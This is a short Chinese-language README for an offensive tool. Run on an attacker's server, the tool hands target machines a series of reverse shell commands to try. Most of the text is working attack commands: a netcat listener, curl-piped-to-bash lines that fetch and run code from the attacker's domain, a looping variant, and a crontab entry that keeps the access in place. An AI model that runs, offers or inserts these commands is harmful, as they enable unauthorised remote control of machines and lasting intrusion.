这是一个node.js脚本改的python工具,攻击者搭建服务器先运行该程序,会启动一个web服务。然后只需在目标机器中对服务器发起请求,提交反弹shell的地址和端口,会自动返回构造好的shell命令然后逐个测试,直到命令成功执行。
运行方法:
VPS / Domain :
python Get_Reverse_Shell.py
Attacker:
nc -lvp [reverse_port]
Target
curl http://domain/reverse_ip/reverse_port | bash
或者
while true; do curl http://domain/reverse_ip/reverse_port | bash; done
配合crontab使用效果更佳
crontab -e
/usr/bin/curl http://domain/reverse_ip/reverse_port | bash